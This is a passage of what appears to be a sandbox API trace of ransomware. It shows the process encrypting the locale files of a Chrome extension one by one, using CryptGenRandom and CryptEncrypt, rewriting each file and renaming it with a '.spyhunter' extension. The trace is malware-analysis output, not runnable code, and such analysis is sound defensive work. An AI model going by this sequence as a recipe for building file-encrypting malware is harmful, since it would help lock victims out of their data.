lpNewFilePointer=0x0) returned 1 [0134.061] WriteFile (in: hFile=0x184, lpBuffer=0x25cf534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf4f4, lpOverlapped=0x0 | out: lpBuffer=0x25cf534*, lpNumberOfBytesWritten=0x25cf4f4*=0x4, lpOverlapped=0x0) returned 1 [0134.062] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf4f4*=0x30, lpOverlapped=0x0) returned 1 [0134.062] CloseHandle (hObject=0x184) returned 1 [0134.062] GetProcessHeap () returned 0x2c0000 [0134.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.062] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.spyhunter") returned 168 [0134.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json.spyhunter")) returned 1 [0134.062] GetProcessHeap () returned 0x2c0000 [0134.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.063] GetProcessHeap () returned 0x2c0000 [0134.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.063] GetProcessHeap () returned 0x2c0000 [0134.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7f88 | out: hHeap=0x2c0000) returned 1 [0134.064] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf530 | out: pbBuffer=0x25cf530) returned 1 [0134.064] GetProcessHeap () returned 0x2c0000 [0134.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.064] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf528*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf528*=0x30) returned 1 [0134.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.064] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0134.064] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.065] GetProcessHeap () returned 0x2c0000 [0134.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.065] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf4ec*=0xd7, lpOverlapped=0x0) returned 1 [0134.068] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.074] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x25cf4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf4ec*=0xd7, lpOverlapped=0x0) returned 1 [0134.074] GetProcessHeap () returned 0x2c0000 [0134.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.074] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.074] WriteFile (in: hFile=0x184, lpBuffer=0x25cf52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf4ec, lpOverlapped=0x0 | out: lpBuffer=0x25cf52c*, lpNumberOfBytesWritten=0x25cf4ec*=0x4, lpOverlapped=0x0) returned 1 [0134.074] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf4ec*=0x30, lpOverlapped=0x0) returned 1 [0134.074] CloseHandle (hObject=0x184) returned 1 [0134.074] GetProcessHeap () returned 0x2c0000 [0134.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.074] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.spyhunter") returned 168 [0134.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json.spyhunter")) returned 1 [0134.075] GetProcessHeap () returned 0x2c0000 [0134.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.075] GetProcessHeap () returned 0x2c0000 [0134.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.075] GetProcessHeap () returned 0x2c0000 [0134.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7e00 | out: hHeap=0x2c0000) returned 1 [0134.078] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf528 | out: pbBuffer=0x25cf528) returned 1 [0134.078] GetProcessHeap () returned 0x2c0000 [0134.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.078] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf520*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf520*=0x30) returned 1 [0134.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0134.079] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.079] GetProcessHeap () returned 0x2c0000 [0134.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.079] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf4e4*=0xed, lpOverlapped=0x0) returned 1 [0134.080] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.080] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x25cf4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf4e4*=0xed, lpOverlapped=0x0) returned 1 [0134.080] GetProcessHeap () returned 0x2c0000 [0134.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.080] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.080] WriteFile (in: hFile=0x184, lpBuffer=0x25cf524*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf4e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf524*, lpNumberOfBytesWritten=0x25cf4e4*=0x4, lpOverlapped=0x0) returned 1 [0134.080] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf4e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf4e4*=0x30, lpOverlapped=0x0) returned 1 [0134.080] CloseHandle (hObject=0x184) returned 1 [0134.080] GetProcessHeap () returned 0x2c0000 [0134.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.081] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.spyhunter") returned 165 [0134.081] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.spyhunter")) returned 1 [0134.081] GetProcessHeap () returned 0x2c0000 [0134.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.081] GetProcessHeap () returned 0x2c0000 [0134.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.081] GetProcessHeap () returned 0x2c0000 [0134.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7af0 | out: hHeap=0x2c0000) returned 1 [0134.082] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf520 | out: pbBuffer=0x25cf520) returned 1 [0134.082] GetProcessHeap () returned 0x2c0000 [0134.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.082] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf518*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf518*=0x30) returned 1 [0134.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.084] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0134.084] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.084] GetProcessHeap () returned 0x2c0000 [0134.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.084] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf4dc*=0x10e, lpOverlapped=0x0) returned 1 [0134.085] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffef2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.085] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x10e, lpNumberOfBytesWritten=0x25cf4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf4dc*=0x10e, lpOverlapped=0x0) returned 1 [0134.085] GetProcessHeap () returned 0x2c0000 [0134.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.085] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.085] WriteFile (in: hFile=0x184, lpBuffer=0x25cf51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf4dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf51c*, lpNumberOfBytesWritten=0x25cf4dc*=0x4, lpOverlapped=0x0) returned 1 [0134.085] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf4dc*=0x30, lpOverlapped=0x0) returned 1 [0134.085] CloseHandle (hObject=0x184) returned 1 [0134.085] GetProcessHeap () returned 0x2c0000 [0134.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.085] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.spyhunter") returned 165 [0134.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.spyhunter")) returned 1 [0134.086] GetProcessHeap () returned 0x2c0000 [0134.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.086] GetProcessHeap () returned 0x2c0000 [0134.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.086] GetProcessHeap () returned 0x2c0000 [0134.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc77e0 | out: hHeap=0x2c0000) returned 1 [0134.087] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf518 | out: pbBuffer=0x25cf518) returned 1 [0134.087] GetProcessHeap () returned 0x2c0000 [0134.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.087] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf510*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf510*=0x30) returned 1 [0134.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.087] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0134.087] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.087] GetProcessHeap () returned 0x2c0000 [0134.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.088] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf4d4*=0xdd, lpOverlapped=0x0) returned 1 [0134.088] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.088] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x25cf4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf4d4*=0xdd, lpOverlapped=0x0) returned 1 [0134.088] GetProcessHeap () returned 0x2c0000 [0134.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.089] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.089] WriteFile (in: hFile=0x184, lpBuffer=0x25cf514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf4d4, lpOverlapped=0x0 | out: lpBuffer=0x25cf514*, lpNumberOfBytesWritten=0x25cf4d4*=0x4, lpOverlapped=0x0) returned 1 [0134.089] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf4d4*=0x30, lpOverlapped=0x0) returned 1 [0134.089] CloseHandle (hObject=0x184) returned 1 [0134.089] GetProcessHeap () returned 0x2c0000 [0134.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.089] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.spyhunter") returned 165 [0134.089] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.spyhunter")) returned 1 [0134.089] GetProcessHeap () returned 0x2c0000 [0134.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.090] GetProcessHeap () returned 0x2c0000 [0134.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.090] GetProcessHeap () returned 0x2c0000 [0134.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc74d0 | out: hHeap=0x2c0000) returned 1 [0134.091] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf510 | out: pbBuffer=0x25cf510) returned 1 [0134.091] GetProcessHeap () returned 0x2c0000 [0134.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.091] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf508*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf508*=0x30) returned 1 [0134.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.091] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json") returned 155 [0134.091] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.091] GetProcessHeap () returned 0x2c0000 [0134.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.091] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf4cc*=0x104, lpOverlapped=0x0) returned 1 [0134.092] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.092] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x25cf4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf4cc*=0x104, lpOverlapped=0x0) returned 1 [0134.092] GetProcessHeap () returned 0x2c0000 [0134.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.092] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.092] WriteFile (in: hFile=0x184, lpBuffer=0x25cf50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf4cc, lpOverlapped=0x0 | out: lpBuffer=0x25cf50c*, lpNumberOfBytesWritten=0x25cf4cc*=0x4, lpOverlapped=0x0) returned 1 [0134.093] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf4cc*=0x30, lpOverlapped=0x0) returned 1 [0134.093] CloseHandle (hObject=0x184) returned 1 [0134.093] GetProcessHeap () returned 0x2c0000 [0134.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.093] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.spyhunter") returned 165 [0134.093] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: 